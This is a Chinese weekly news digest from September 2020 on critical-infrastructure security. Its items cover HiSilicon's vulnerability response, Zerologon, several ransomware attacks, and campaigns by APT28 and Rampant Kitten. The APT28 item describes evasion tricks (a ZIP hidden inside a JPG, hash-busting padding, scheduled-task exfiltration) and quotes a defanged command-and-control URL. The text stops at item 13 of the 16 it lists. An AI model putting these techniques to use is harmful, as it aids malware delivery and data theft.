关键信息基础设施安全动态周报【2020年第38期】
发布时间:
2020-09-25
来源:
作者:
访问量:
144
目 录
第一章 国内关键信息基础设施安全动态
(一)华为否认海思视频监控芯片存在后门
第二章 国外关键信息基础设施安全动态
(一)FERC及NERC发布电力公司网络事件响应计划
(二)美国政府发布紧急指令要求修复Zerologon漏洞
(三)印度国家信息中心遭受网络攻击,超过100台计算机受到影响
(四)美国高性能激光器生产商IPG Photonics遭受勒索软件攻击
(五)政府软件提供商Tyler Technologies遭受勒索软件攻击
(六)德国加密电子邮件服务Tutanota遭受DDoS攻击
(七)俄罗斯黑客组织APT28伪造北约文件入侵政府网络
(八)伊朗黑客组织Rampant Kitten收集潜在对手情报
(九)CISA发布警告LokiBot恶意软件显著增加
(十)NSA发布远程工作者及系统管理员网络安全指南
(十一)英国NCSC警告针对教育机构的勒索软件攻击激增
(十二)美国政府欲更新海上网络安全战略
(十三)NASA面临越来越多的国内外黑客攻击
(十四)无文件恶意软件成为关键端点威胁之首
(十五)Mozi僵尸网络占物联网流量的90%
(十六)意大利知名眼镜企业Luxottica遭受网络攻击
第一章 国内关键信息基础设施安全动态
(一)华为否认海思视频监控芯片存在后门
海思半导体是全球领先的Fabless半导体和IC设计公司,致力于向包含视频监控、机顶盒、智能家庭等领域的全球设备商提供全面的联接和多媒体芯片解决方案。
视频监控设备漏洞响应可能涉及漏洞研究组织/个人、芯片供应商、组件供应商、设备商和最终用户等各利益相关方,需要清晰认识到供应链的复杂性,其中的任意一环都会引入漏洞,这也增大了漏洞响应的难度,协调式漏洞披露是解决这种场景下业界最佳实践。海思作为视频监控设备供应链中的重要一环,愿意联合产业链的利益相关人,通过协调的漏洞披露共同应对漏洞带来的网络安全风险,保护最终用户的利益。
海思关注到2020年9月16日部分媒体报道基于Hisilicon HI3520DV400视频监控芯片的DVR/NVR设备中的安全漏洞:CVE-2020-24214, CVE-2020-24215, CVE-2020-24216, CVE-2020-24217, CVE-2020-24218, CVE-2020-24219 。海思第一时间对报告中提到的安全问题进行了调查并将我们的调查结果提供如下。该漏洞并非由海思提供的芯片及SDK包引入。
海思为客户(设备制造商)提供芯片、操作系统内核(如某个版本的Linux kernel)、以及配套的SDK(以驱动为主)开发平台,设备制造商基于海思的平台,进行具体产品的设计和开发。海思芯片在整个设备中的逻辑示意如下图1-1所示:
上图中蓝色部分为海思提供。而绿色为开源代码,由海思作为参考代码提供给设备商,橙色部分由设备商进行交付。研究者提到的安全漏洞分析如下:
Full administrative access via backdoor password (CVE-2020-24215):文中描述的可执行程序box.v400_hdmi属于设备商应用(图1-1中橙色部分),海思SDK包中不包含该功能。
Administrative root access via telnet (CVE-2020-24218):海思SDK包中,默认不会启动任何网络服务,不会设置任何账号及相关密码。同时,海思将“二次开发网络安全注意事项”文档随软件包提供给设备商,文档中建议在产品的最终量产版本中增加权限管理与安全配置功能。
Arbitrary file read via path traversal (CVE-2020-24219):通过web服务对外提供文件操作服务,属于设备商应用(图1-1中橙色部分),海思SDK包中不包含该功能。
Unauthenticated file upload 、Arbitrary code execution by uploading malicious firmware 、Arbitrary code execution via command injection (CVE-2020-24217):升级功能是设备厂商根据产品应用场景提供的能力,属于设备商应用(图1-1中橙色部分),海思SDK包中不包含该功能。
Denial of service via buffer overflow (CVE-2020-24214):应用程序代码中使用的sprintf函数存在内存溢出漏洞,导致box.v400_hdmi拒绝服务。这部分代码属于设备商应用(图1-1中橙色部分),海思SDK包中不包含该代码。
Unauthorized video stream access via RTSP (CVE-2020-24216):通过RTSP服务对外提供视频流业务,属于设备商应用(图1-1中橙色部分),海思SDK包中不包含该功能。
综上分析,以上漏洞都存在于设备商应用(图1-1中橙色部分)中,这些漏洞并非由海思提供的芯片及SDK包引入。
对于文章中提到的漏洞,海思作为视频监控设备供应链中的重要一环,愿意联合下游厂商和研究者,通过协同来应对漏洞带来的网络安全风险,保护最终用户的利益。
本文版权归原作者所有,参考来源:华为 http://dwz.date/cAMm
第二章 国外关键信息基础设施安全动态
(一)FERC及NERC发布电力公司网络事件响应计划
美国联邦能源监管委员会(FERC)和北美电力可靠性公司(NERC)9月17日发布了一份有关响应和恢复网络规划的报告,概述了电力公用事业公司的网络事件响应和恢复最佳实践。
这份报告是基于FERC、NERC和NERC区域实体的工作人员进行的一项研究。这项研究基于美国八家不同规模和功能的电力公用事业公司的专家提供的信息,其目标是帮助该行业改善事件响应和事件恢复计划,研究作者表示,这有助于确保大宗电力系统在发生网络安全事件时的可靠性。
研究发现,不存在最佳事件响应和恢复(IRR)计划模型。目标公用事业公司的IRR计划有许多相似之处,它们基于相同的NIST框架(SP 800-61)。但也存在差异,一些组织为影响其运营和业务网络的事件制定了单独的计划。
然而,NERC和FERC的工作人员已经确定了一些做法,所有电力公用事业公司在制定IRR计划时都应该考虑这些做法。
在准备阶段,他们建议明确定义人员角色,并授权员工在没有不必要延误的情况下采取行动,认识到人的重要性,同时利用技术和工具,确保员工接受过良好的培训并始终更新他们的技能,并吸收从过去事件和测试中吸取的经验教训。
在事件检测和分析阶段,报告建议使用基线来检测潜在事件,并使用决策树或流程图快速评估是否达到特定风险阈值以及某些情况是否符合事件条件。
在遏制和根除阶段,内部收益率计划应考虑所采取措施的影响。组织应彻底了解,例如,在发生事故时隔离运营网络的潜在影响。它还应考虑到环境中存在的恶意软件可能会引发破坏性操作的可能性,这些破坏性行为由遏制策略自动触发。 在此阶段需要考虑的另一个重要因素与长度不确定的事件响应的资源影响有关。 至于事故后的活动,报告建议利用从事故和模拟中吸取的经验教训,改进内部收益率计划,并解决可能存在的不足。
参考来源:SecurityWeek http://dwz.date/cCnT
(二)美国政府发布紧急指令要求修复Zerologon漏洞
研究人员上周揭露Windows一项风险评分10.0的重大安全漏洞Zerologon,可让黑客黑入并控制公司Active Directory网域。美国国土安全部9月18日因而发布今年第4次紧急指令(Emergency Directive),要求所有政府机构应在周一午夜前修补好该漏洞。
最新编号CVE-2020-1472,又名为Zerologon的漏洞位于Windows Server中Active Directory核心验证元件Netlogon远端协议(MS-NRPC)中,可让未经授权的攻击者藉由和网域控制器建立TCP连线时,植入假造的Netlogon验证口令而登入网域控制器,进而完全掌控所有AD网域内的身份服务,结果就是在网域下任何一台装置执行恶意程序。
这项漏洞安全风险达到最严重的10.0分。除了从网络上移除AD网域控制器外,目前唯一缓解威胁的方法就是安装微软8月11日公布的补丁程序。
国土安全部20-04号紧急指令(Emergency Directive)指出,有鉴于联邦企业架构内受影响网域控制器之普遍、漏洞公告已持续30天以上,加上网络已流传攻击程序码,CISA要求联邦政府机关立即修补Windows Server中网域控制器的漏洞。
所有联邦机关应在9月21日周一的晚间11:59,将所有Windows Server安装8月安全更新,而所有新配发或之前未连网的装置,应在连上政府网路前确保做好技术及管理控管。本命令要求任何信息系统内的Windows Server AD网域控制器皆在修补范围内,包括代替政府搜集、处理、储存、传输、发送政府资讯的IT系统。除了扫瞄任何漏洞外,CISA也建议政府机关使用其他方法来确定已部署好更新。
此外CISA也要求各政府机关要在9月23日的11:59前传送完成报告到CISA,包括现有系统安装更新,新系统也保证会在连网前修补好。CISA表示之后也将对各机关展开遵循的稽核验证,并预计10月初向国土安全部及美国行政管理和预算局(OMB)提交报告。微软8月初的安全更新只是第一阶段修补,预计明年第一季再会做更完整的修补。
参考来源:iThome http://dwz.date/cBQv
(三)印度国家信息中心遭受网络攻击,超过100台计算机受到影响
近日,印度最大的数据机构NIC(国家信息中心)遭受未知恶意软件入侵。攻击是通过电子邮件发送的,渗透到网络中,大约有一百台计算机受到了影响。
攻击事件发生后,该事件已报告给德里警察特别小组,该案已根据《信息技术法》(IT法)进行了注册。攻击来自一封电子邮件,该电子邮件是由员工打开的,来自计算机的所有数据均被盗并加密。
国家信息学中心是电子和信息技术部(MEITY)的一个分支机构。NIC负责政府的技术基础设施以及数字印度倡议的实施和交付。该研究所包含与国家安全、印度公民、内政部、安全顾问有关的敏感信息,而被盗的数据很可能损害国家利益。
经过德里警方的调查,确认该攻击为来自电子邮件诱饵的恶意软件。虽然只有一名员工报告了此消息,但有几名员工收到了包含恶意软件的邮件,当用户单击此邮件时,其系统受到了威胁。同样,数百台这样的计算机也被感染了。邮件中的IP地址被检测为来自一家美国公司的班加罗尔办事处。
一些消息来源说,这种攻击来自臭名昭著的黑客组织Anonymous。几天后,根据firstpost.com以及印度陆军官方网站发布的消息,一封信已寄给了印度政府。该信内容如下:“又是我们Anonymous。对于印度人民和政府, 你们低估了人的力量。你们认为Anonymous的第一次攻击是一个好玩的行为,你们再好好想想。我们不是来这里和你们一起玩儿的。我们在这里向所有支持反腐败法案的人发送信息。我们摧毁了印度陆军官方网站,NIC对我们所做的事情了解更多。我们不支持任何人,我们仅支持《反腐败法案》。没有人可以代表Anonymous,没有什么是官方的。”
有可能这两起攻击是有关联的,而且来自同一个组织。
参考来源:EHackingNews http://dwz.date/cAUk
(四)美国高性能激光器生产商IPG Photonics遭受勒索软件攻击
美国高性能光纤激光器生产商IPG Photonics近日遭受了勒索软件攻击,扰乱了其运营。
IPG Photonics是一家为不同应用和行业生产高性能光纤激光器、放大器和激光系统的美国领先制造商。该公司于1990年由物理学家瓦伦丁·加蓬采夫在俄罗斯创立,总部位于马萨诸塞州牛津市,在全球各地设有办事处,全球拥有4000多名员工,2019年的收入为13亿美元。
该公司的激光被用作美国海军“庞塞号”上安装的激光武器系统(LaWS)的一部分。该系统是一种针对小型威胁和车辆的实验性防御武器。
据消息人士称,勒索软件攻击已经扰乱了该公司在全球的运营。该攻击影响了办公室中的电子邮件、电话和网络连接。
由于此次攻击,IPG Photonics IT系统在全球范围内关闭,影响办公室中的电子邮件、电话和网络连接。随着这些系统的关闭,零件制造和运输也变得不可用。
据推测,这次攻击是由RansomExx勒索软件操作员实施的,该团伙最近袭击了IT巨头柯尼卡美能达(Konica Minolta)。RansomEXX是人工操作的勒索软件,这意味着攻击者在获得对目标网络的访问权限后手动感染系统。2020年6月,同样的勒索软件也被用于攻击德克萨斯州交通部。好消息是,与其他勒索软件系列不同的是,RansomEXX赎金在加密目标系统之前似乎不会泄露数据。
参考来源:SecurityAffairs http://dwz.date/cBDS
(五)政府软件提供商Tyler Technologies遭受勒索软件攻击
美国政府技术服务提供商Tyler Technologies 9月23日遭受勒索软件攻击,导致其运营中断。
Tyler Technologies是美国最大的公共部门的软件开发和技术服务公司之一。Tyler Technologies预计2020年收入为12亿美元,拥有5500名员工,为美国许多州的地方政府提供技术服务。
从23日早些时候开始,Tyler Technologies网站开始显示一条维护消息,他们的Twitter账户在推特上表示,他们遇到了技术问题。
Tyler首席信息官马特•比埃里(Matt Bieri)给客户发了电子邮件,称他们正在调查一起网络攻击事件,并已通知了执法部门。比埃里还表示,目前的调查表明,攻击仅限于Tyler公司的本地网络。
在加利福尼亚州市政信息系统协会(MISAC)论坛上的帖子中,用户听说Tyler Technologies 遭受了勒索软件攻击,影响了他们的电话票务系统和支持系统。
熟悉这次攻击的网络安全消息人士表示,Tyler Technologies遭受了RansomExx勒索软件的攻击。RansomExx是Defray777勒索软件的更名版本,自6月份他们攻击德克萨斯州交通部(TxDOT)、柯尼卡美能达(Konica Minolta)和最近的IPG Photonics以来,活动有所增加。
虽然尚未收到赎金通知,但上传到VirusTotal的一个加密文件与此次攻击有关。此加密文件的扩展名为“tylertech911-f1e1a2ac”,其中包含Tyler Technologies的名称,并且与其他RansomExx攻击中使用的格式相同。RansomExx没有勒索软件数据泄露网站,但这并不意味着他们在部署勒索软件之前不会窃取未加密的文件。
参考来源:BleepingComputer http://dwz.date/cC4e
(六)德国加密电子邮件服务Tutanota遭受DDoS攻击
近日,德国加密电子邮件服务Tutanota遭受DDoS攻击,该网站及DNS提供商均称为攻击目标。
该公司目前有200多万用户,其中一些用户有几个小时无法访问该服务。
第一次DDoS攻击发生在9月14日之前的那个周末,在攻击之后,数百名用户无法访问该服务。之后Tutanota发表了一篇博客文章解释称,其已加强了防御DDoS的措施,这将使其在未来能够更快地应对此类攻击,该公司现在能够在短时间内缓解大多数攻击。在第二波攻击中,威胁参与者攻击托管Tutanota记录的DNS提供商,而不是公司服务器。
Tutanota在发布的第二篇文章写道:“在多次直接攻击Tutanota之后,攻击者昨天将目标对准了托管Tutanota DNS记录的两家提供商。结果,这些供应商停机了。我们很快尝试更新DNS记录,并将其托管在另一个提供商上。最初这不起作用,因为DNS条目在其中一个DNS托管提供商处被锁定。当我们将另一个域名转移到另一个注册商时,我们的tutanota.com域名再次被锁定。然后,我们在第三个更强大的DNS主机提供商上注册了我们的域名,该提供商能够抵御持续的攻击。我们已经更新了我们的DNS记录,最终在欧洲中部时间周四早上7:30左右恢复了通用访问。”
由于DDoS攻击,DNS提供商停机,公司无法更改其域的DNS条目。数百万用户无法访问他们的Tutanota账户。由于间歇性中断,发送给用户的几封电子邮件可能没有送达。Tutanota证实,攻击发生后,没有用户数据被泄露,该公司还补充说,它仍在遭受可访问性问题。
“现在剩余的问题是由缓存和传播引起的:在旧DNS条目过期之前,每个DNS服务器都不会请求下一次更新。在我们的域被锁定期间,某些服务器缓存了旧的名称服务器。这就是为什么有些用户仍然无法访问Tutanota的原因,尽管我们的状态页面显示一切都已启动并运行。DNS条目正在缓慢传播,以便很快所有用户都可以再次访问Tutanota。”
参考来源:SecurityAffairs http://dwz.date/cBJv
(七)俄罗斯黑客组织APT28伪造北约文件入侵政府网络
俄罗斯黑客组织APT28(又名Fancy Bear、Sofacy、Sednit、STRONTIUM)正在策划一场针对政府机构的攻击行动。 该组织以提供北约训练材料为诱饵,传播了一系列难以察觉的Zebrocy Delphi恶意软件,包含有效载荷的JPG文件在计算机上打开时显示了北约的图像。
今年8月,奇安信红雨滴小组报告发现了一个APT28行动,该行动使用伪装成北约训练课程材料的Zebrocy恶意软件。然而,威胁情报公司QuoIntelligence早在8月8日,也就是有关这一行动的信息公布之前,就已经提醒了政府部门的客户注意这一行动。
QuoIntelligence研究人员提供了进一步的分析,并推断此次行动的目标至少是一个中东国家(阿塞拜疆)以及其他北约国家。阿塞拜疆虽然不是北约成员国,但它与北大西洋组织密切合作,并参加北约演习。此外,同样的行动很可能是针对其他北约成员国或与北约演习合作的国家。在发现恶意活动后,QuoIntelligence已向法国执法机构报告了他们的调查结果。
APT28分发的恶意文件名为“Course 5 – 16 October 10.2020.zipx”。对于不知情的用户来说,这看起来像是包含课程材料的ZIP包。在测试中,当将ZIP文件重命名为“.jpg”时,它的行为几乎与合法的图像文件类似。该文件包含一个合法的JPG图像,并附加了一个ZIP存档文件。
文件元数据和属性还显示“image/jpeg”MIME类型,其中引用了“jpeg image data”。研究人员解释表示:“这项技术之所以有效,是因为JPEG文件是从文件的开头解析的,而有些Zip实现则是从文件末尾解析Zip文件(因为索引就在那里),而不查看前面的签名。”
在奇安信红雨滴团队和QuoIntelligence进行分析时,恶意软件样本在VirusTotal上的检出率非常低,只有3/61。即使在今天,只有不到一半的已知反病毒引擎标记了VirusTotal上的感染:
这种技术也被威胁者用来逃避AVs或其他过滤系统,因为他们可能会把文件误认为JPEG文件而跳过它。解压缩时,ZIP文件包含一个损坏的Excel(.xls)文件和另一个文件,文件名为“Course 5-16 October 2020”,但扩展名为EXE。在Windows系统上,“Course 5-16 October 2020.exe”文件显示一个PDF图标(可执行文件允许在Windows上使用自定义文件图标)。
QuoIntelligence的研究人员假设这可能是黑客组织有意采用的策略,类似的绕过电子邮件网关的技术在过去也曾出现过。如果在一个包含故意损坏的XLS文件的ZIP文件中提供课程材料,可能会诱使用户双击看起来像PDF的EXE文件。
此活动使用的Zebrocy是一种持续的恶意软件感染,是已知具有多种功能的后门程序,如系统侦察、文件创建/修改、在受感染计算机上截取屏幕快照、执行任意命令以及创建Windows计划任务。众所周知,该样本还会将多个文件丢弃到受感染的系统上,使其变得“相当响亮”,因为它的活动会引起主要安全产品的警报。
在本例中,Zebrocy有效负载(通过Course 5 - 16 October 2020.exe显示)通过将自身复制到“%AppData%\Roaming\Service\12345678\sqlservice.exe”中来工作,并进一步向新生成的文件添加一个随机的160字节的 BLOB。填充的数据通过改变结果文件的校验和,使得基于签名的反病毒引擎难以进行基于哈希的检测。
此外,研究人员称,恶意软件创建了一个Windows计划任务,该任务每分钟运行一次,将被盗数据发布到指挥与控制(C2)服务器。该任务定期运行,并尝试将窃取的数据发布到hxxp://194.32.78[.]245/protect/get-upd-id[.]php。恶意软件传输的数据似乎具有模糊和加密的字节,但数字ID(在本例中为12345678)在请求之间保持不变。
研究人员怀疑这是恶意软件每次请求中包含的受感染机器的唯一标识符。QuoIntelligence怀疑这款恶意软件的目标是阿塞拜疆政府机构,这是基于该公司之前分析的一次RestHellcat活动。
参考来源:BleepingComputer http://dwz.date/cCzg
(八)伊朗黑客组织Rampant Kitten收集潜在对手情报
Check Point研究人员发现了一个与伊朗有关联的组织Rampant Kitten,该组织的目标是反政府组织,这场运动可能从2014年就开始了。
主要目标包括圣战者组织(MEK)和阿塞拜疆全国抵抗组织的支持者,这两个著名的抵抗运动主张解放伊朗人民和伊朗境内的少数民族。这些目标,再加上WHOIS记录显示伊朗个人注册了相关的恶意网站,以及发现一名注册者的电子邮件地址链接到伊朗黑客论坛,足以让Check Point的研究人员得出结论,Rampant Kitten是一个伊朗组织,这本身就意味着与伊朗政府有联系。其目的是寻求关于持不同政见者团体成员及其活动的情报。
这场运动中使用的攻击载体已经隐蔽了六年,包括四种不同的Windows信息窃取工具(窃取文件、窃取电报桌面和KeePass账户信息);一个Android后门用来窃取短信中的2FA代码和录音;以及一个利用虚假Telegram服务账户分发的Telegram钓鱼页面。
这场运动最初是通过发现一份针对阿尔巴尼亚MEK的文件而披露的。MEK最初的总部设在伊拉克,但随着政治紧张局势的加剧,已迁往阿尔巴尼亚。恶意文档使用从远程服务器下载的外部模板。该模板包含一个宏,该宏执行尝试下载下一阶段有效负载的批处理脚本。有效负载检查是否安装了Telegram,如果安装了,则从其资源中提取三个额外的可执行文件。它们是Loader,它将主要有效负载注入Explorer.exe;Infostealer有效负载;以及updater.exe,它是修改后的Telegram更新器。
后者基于Telegram的内部更新过程,提供了一种独特的持久化机制。恶意软件会定期将Telegram Main可执行文件复制到“Telegram Desktop\tupdate”中。一旦启动,这将触发电报应用程序的更新过程。但是,默认更新程序文件(Telegram Desktop\Updater.exe)已经修改,最明显的是再次运行有效负载。
对这一有效载荷的分析导致发现了可追溯到2014年的多种变体。这发现了由同一组织运营的更多网站。其中一些网站托管了模仿电报的钓鱼页面。令人惊讶的是,这次网络钓鱼攻击似乎已经为伊朗电报用户所知,几个伊朗电报频道对钓鱼网站发出警告,声称伊朗政权是幕后黑手。这些渠道表明,钓鱼信息是由电报机器人发送的。这些信息警告收件人,他们正在不当使用Telegram的服务,如果他们不进入钓鱼链接,他们的账户将被屏蔽。
研究人员还发现了一个与同一攻击组织有关的恶意Android应用程序。这款应用程序伪装成一项服务,帮助在瑞典说波斯语的人获得驾照。发现了两个版本,一个显然是作为测试版本编译的,另一个是要部署在目标设备上的发布版本。
Android后门可以窃取现有短信;将2FA短信转发到攻击者控制的C&C服务器提供的电话号码;检索联系人和账户详细信息等个人信息;启动手机周围环境的语音记录;执行谷歌账户网络钓鱼;以及检索设备信息,如已安装的应用程序和正在运行的进程。
Check Point威胁情报经理Lotem Finkelsteen评论说,“在进行我们的研究后,有几件事特别突出。首先,我们非常关注即时通讯监控。虽然Telegram无法解密,但它显然是可劫持的。即时通讯监控,特别是Telegram,是每个人都应该谨慎和警惕的事情。其次,移动、PC和网络钓鱼攻击都与同一行动有关。这些行动是根据情报和国家利益管理的,而不是技术挑战。”
Rampant Kitten似乎至少在六年内一直在进行此活动,但基本上未被发现。目标是与一些伊朗反政权组织有关联的持不同政见者。几乎可以肯定的是,这是伊朗威胁行为者的另一个例子,很可能与伊朗政权有某种联系,收集有关该政权潜在反对者的情报。
参考来源:SecurityWeek http://dwz.date/cBN4
(九)CISA发布警告LokiBot恶意软件显著增加
美国网络安全和基础设施安全局(CISA)9月22日发布警告称,自2020年7月以来,恶意网络参与者对LokiBot恶意软件的使用显着增加。CISA的EINSTEIN入侵检测系统保护联邦、民用行政部门网络,已检测到持续的恶意LokiBot活动。LokiBot使用凭据和信息窃取恶意软件,通常以恶意附件的形式发送,并且以简单而有效而著称,使其成为针对各种数据泄露用例的广泛网络参与者的有吸引力的工具。
Lokibot恶意软件自2015年以来一直活跃,它是一个信息窃取程序,参与了许多旨在从网络浏览器、电子邮件客户端和管理工具获取凭据的恶意垃圾邮件活动,还被用来攻击加密钱包的所有者。恶意软件能够窃取敏感信息(各种凭据,包括FTP凭据、存储的电子邮件密码、存储在浏览器中的密码以及大量其他凭据)。
最初的LokiBot恶意软件是由一个名为“lokistov”(又名Carter)的黑客在线开发和销售的。恶意代码最初在许多黑客论坛上以高达300美元的价格发布广告,后来其他威胁行为者开始以低于80美元的价格在地下网络犯罪中提供。随着时间的推移,威胁的作者实现了一些新的功能,如实时记录按键、桌面截图和功能。
CISA LokiBot警告包括针对LokiBot攻击的检测签名和缓解建议。以下是缓解措施:
维护最新的防病毒特征码和引擎。请参阅防范恶意代码;
使操作系统补丁保持最新。请参阅了解修补程序和软件更新;
禁用文件和打印机共享服务。如果需要这些服务,请使用强密码或Active Directory身份验证;
实施多因素身份验证。有关详细信息,请参阅补充密码;
限制用户安装和运行不需要的软件应用程序的能力(权限)。除非需要,否则不要将用户添加到本地管理员组;
强制实施强密码策略。请参阅选择和保护密码;
打开电子邮件附件时要小心,即使附件是预期的并且发件人是已知的;
在机构工作站上启用个人防火墙,配置为拒绝未经请求的连接请求;
禁用代理工作站和服务器上不必要的服务;
扫描并删除可疑的电子邮件附件;确保扫描的附件是其“真正的文件类型”(即扩展名与文件头匹配)。
监控用户的网页浏览习惯;限制访问包含不良内容的网站;
使用可移动介质(例如U盘、外部驱动器、CD)时要小心;
在执行之前扫描从互联网下载的所有软件;
保持对最新威胁的态势感知,并实施适当的访问控制列表;
访问MITRE ATT&CK技术页面,了解其他缓解和检测策略。
参考来源:SecurityAffairs http://dwz.date/cCt5
(十)NSA发布远程工作者及系统管理员网络安全指南
美国国家安全局(NSA)发布了两份网络安全信息表(CSI),为国家安全系统(NSS)和国防部(DoD)工作人员和系统管理员提供了在家办公期间保护网络和应对事件的建议。
第一个CSI名为“受危害的个人网络指标和缓解措施”,旨在提供有关远程工作者如何识别和减轻其个人网络受损的详细信息,以及在远程工作时保护政府提供的数据和设备。 此外,CSI还提供了一系列的妥协指标(IoC),以及远程工作者可以应用的缓解技术来防止未来的危害。国家安全局指出,CSI是为政府雇员准备的,但任何人都可以使用所提供的信息来识别和防止网络漏洞。
CSI称:“虽然无法确保个人网络完全不受攻击,但攻击者持续存在,并继续寻找规避安全控制的方法,但用户仍可以采取措施,帮助防止未来的攻击。”如果遵守文件中概述的IoC,建议用户对连接到其个人网络的任何计算机、移动设备或物联网设备应用所提供的缓解措施。
国家安全局称,建议采取的措施来减轻这种危害,包括重新启动和重置路由器,禁用其远程管理功能并更新固件;断开受感染机器与网络的连接,在不同设备上重置密码,运行反恶意软件;清除勒索软件感染,恢复以前备份的良好状态。该文件还详细说明了一系列更具攻击性的行动,这些行动都是为了帮助用户消除来自其个人设备或网络的威胁,以及减轻这种危害。
NSA的第二个CSI名为“执行带外网络管理”,它向系统管理员提供如何将管理流量与操作流量隔离的信息,以确保受损设备或恶意流量不会影响网络操作或危害网络基础设施。“OoB(带外)管理创建了一个框架,使管理员能够通过将管理流量与操作流量分开,并确保管理流量仅来自OoB通信路径来提高其网络的安全性”。
该文件提供了关于OoB管理的体系结构设计的信息,并建议首先进行脆弱性和风险评估,以决定是否应实施虚拟或物理分段的OoB网络架构。NSA建议使用加密协议和强加密算法和密钥大小,仅使用强大的虚拟专用网络(VPN)管理设备,强化网络管理设备,持续监控网络和查看日志,并建立配置审查和签入流程,这将允许轻松识别恶意更改。
参考来源:SecurityWeek http://dwz.date/cBRB
(十一)英国NCSC警告针对教育机构的勒索软件攻击激增
英国国家网络安全中心(NCSC)发布了针对教育机构的勒索软件攻击激增的警报。英国安全局敦促该行业的机构遵循这些建议,以降低暴露在勒索软件攻击下的风险。
NCSC运营总监保罗·奇切斯特(Paul Chichester)表示,“这种针对教育部门的犯罪行为,特别是在这样一个充满挑战的时刻,是完全应该受到谴责的。虽然这些都是个别事件,但我强烈敦促所有学术机构提高警惕,并采取我们建议的措施,以帮助确保年轻人能够不受干扰地重返教育。我们绝对致力于确保英国学术界尽可能安全地免受网络威胁,并将在网络威胁演变时毫不犹豫地采取行动。”
今年夏天,NCSC调查了越来越多的针对大学、学校和学院的网络攻击,其中大多数都受到了勒索软件的攻击。随着时间的推移,攻击还在继续,最近纽卡斯尔大学遭到了DoppelPaymer勒索软件的攻击。
NCSC还提供了有关在勒索软件攻击中观察到的初始感染媒介的信息:不安全的远程桌面协议(RDP)配置、易受攻击的软件或硬件、钓鱼电子邮件。
该机构建议实施有效的漏洞管理和补丁管理流程,当然也要确保RDP服务的安全。一旦在目标网络中站稳脚跟,攻击者将尝试横向移动以提升权限并搜索要加密的高价值计算机(即备份服务器、网络共享、服务器、审计设备)。在一些攻击中,政府专家还观察到破坏备份或审核设备以增加恢复难度、对整个虚拟服务器进行加密、使用脚本环境(即PowerShell)轻松部署工具或勒索软件。
以下是该机构提供的建议列表,其中包括使用更新的防病毒软件和反网络钓鱼防御措施:
集中管理设备,以便使用包括AppLocker在内的技术或从受信任的应用商店(或其他受信任的位置)仅允许企业信任的应用在设备上运行;
考虑是否需要企业防病毒或防恶意软件产品,并使软件(及其定义文件)保持最新;
为您的员工提供安全教育和意识培训,例如NCSC为员工提供的顶级提示;
通过以下方式禁用或约束脚本环境和宏:通过用户模式代码完整性(UMCi)策略强制使用PowerShell受限语言模式-您可以将AppLocker用作UMCi的接口,以自动应用受限语言模式;保护您的系统免受恶意Microsoft Office宏的侵害;
禁用已装入介质的自动运行(如果不需要,则禁止使用可移动介质)。
为防止攻击者利用缺陷强制执行其代码,该组织建议:
在安全更新可用时立即安装它们,以便修复产品中可利用的错误;
如果可以,启用操作系统、应用程序和固件的自动更新;
使用最新版本的操作系统和应用程序来利用最新的安全功能;
配置基于主机的防火墙和网络防火墙,默认情况下不允许入站连接。
最近,Check Point的研究人员警告称,针对世界各地教育机构和学术界的DDoS攻击激增。
参考来源:SecurityAffairs http://dwz.date/cBFt
(十二)美国政府欲更新海上网络安全战略
两名美国高级政府官员9月22日称,白宫希望在未来几个月更新美国政府在海上网络安全战略方面的做法,美国政府的当务之急是增强和确保美国在海上投射力量和防御敌对网络攻击的能力。该计划涉及重新审查国家信息共享方法,并更好地强调在港口使用业务技术。
这两名官员拒绝透露有关政府计划的任何具体信息,称将很快获得更多信息。但黑客长期以来一直以航运公司和海运供应链为目标,窃取涉及美国政府的数据或中断货运业务。据美国海岸警卫队(U.S.CoastGuard)称,黑客去年使用一种名为Ryuk的勒索软件入侵了一个海上运输设施的计算机网络,中断了30小时的运营。民族国家黑客还将目标锁定在海上船只上的美国人,诱使他们暴露自己的位置或活动。
一名政府高级官员表示,最近,政府一直担心针对一家航运公司的勒索软件攻击,影响到澳大利亚的COVID-19供应链。攻击者经常通过欺骗或干扰,以位置或导航系统为目标,干扰船只或导航系统,对航运造成危险。
这一宣布正值美国国防部(Department of Department)为测试海上网络攻击做好准备的几项努力之际。五角大楼的进攻性网络部队,网络司令部,模拟了去年对一个海港的网络攻击。美国陆军本月还参加了一次演习,旨在模拟本月以美国港口为目标的对手。
参考来源:cyberscoop http://dwz.date/cCr6
(十三)NASA面临越来越多的国内外黑客攻击
美国宇航局(NASA)高级官员表示,在COVID-19大流行期间,该机构正面临越来越多的外国黑客针对敏感信息的攻击,因此该机构正努力提高其IT安全性。
美国宇航局总督察保罗·马丁向众议院科学、空间和技术委员会小组委员会作证时表示,“NASA拥有数十年积累的大量知识信息资本。我认为国家行为体都在追求这些信息,美国宇航局在全世界都因创新技术非常出名。从个人身份识别信息到系统上的合同数据,各种各样的信息一应俱全。不幸的是,NASA受到国内外网络犯罪分子的攻击,因此,保持NASA的防御能力,是一个持续的、极其困难的问题。”
当委员会成员追问哪些国家参与其中时,马丁承认中国是针对该机构的国家之一。马丁作证说:“美国宇航局正在采取步骤,保护自己的知识产权和网络不受来自中国和其他一系列国家以及当地黑客的攻击。我们进行了一系列刑事调查,并在找到这些问题的线索时会与联邦调查局和反情报官员合作。”
9月18日的听证会集中讨论了COVID-19大流行期间NASA的网络安全和IT安全态势,这迫使大多数员工迅速过渡到在家工作。
NASA代理首席信息官Jeff Seaton在同一小组作证说,工作空间的多样性以及个人设备的使用增加,导致恶意网络钓鱼电子邮件激增,美国宇航局已采取措施解决这些问题。
Seaton表示:“我们发现网络钓鱼攻击有所增加,而在较低级别的一些其他攻击也在增加。归根结底,员工是IT环境中最脆弱的部分。因此,我们尝试实施自动化控制,以使我们的员工更轻松地进行工作,而且在过去两年中,网络钓鱼保护措施有了显著改善。”
司法部起诉了三名伊朗国民,据称代表伊朗伊斯兰革命卫队攻击和侵入卫星和航空公司。航天与航空小组委员会主席肯德尔· 霍恩(Kendr a Horn)指出,起诉书中提到了加强NASA网络安全的重要性。霍恩表示,“ NASA或任何组织是否都将100%免受网络威胁的风险?可能不是。还有改进的空间吗?绝对是的。”
在过去的几年中,该机构面临一系列安全问题。2014年,美国国家航空航天局监察长办公室在审计过程中发现了广泛的安全问题,认为该机构在IT方面面临“管理挑战”。
今年4月,Seaton办公室向美国宇航局(NASA)员工发出警报,他们看到针对家庭工作人员的“新一波网络攻击”,包括恶意软件和网络钓鱼攻击,类似于针对其他机构和私营部门的一波网络攻击。 Seaton在18日承认了这些担忧,但强调已经做出了改进。
